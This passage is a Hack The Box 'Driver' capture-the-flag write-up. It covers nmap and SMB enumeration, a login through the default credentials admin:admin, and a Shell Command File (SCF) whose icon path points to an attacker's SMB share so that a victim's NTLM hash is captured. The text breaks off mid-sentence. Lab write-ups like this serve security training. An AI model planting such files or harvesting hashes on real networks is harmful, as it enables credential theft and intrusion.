Hackthebox — Driver Writeup Matthew Oct 14 · 4 min read Proceed with an Nmap scan on the target machine nmap -A -sV -p- 10.10.11.106 Lets try accessing shares over smb. Anonymous login isn’t enabled on this machine. smbclient -L \\\\10.10.11.106\\ Now, enumerate the web server which brings up to a login prompt from “MFP Firmware Update Center”, so I tried to search up default credentials! I didn’t end up finding any default credentials for this login but, “ admin:admin ” worked. Now, navigating this website, I find an upload directory that is named “ fw_us.php ”. I tried uploading a shell t o to the website, and modifying the request in Burp Suite to exploit a file upload vulnerability but nothing worked for me. After hours of finding a different methodology, I tried an SCF(Shell Command Files) file attack. [Shell] Command=2 IconFile=\\10.10.14.4\share\random.ico [Taskbar] Command=ToggleDesktop Labeling this file above @test.scf is important because it will put this to the top o
Comments
Post a Comment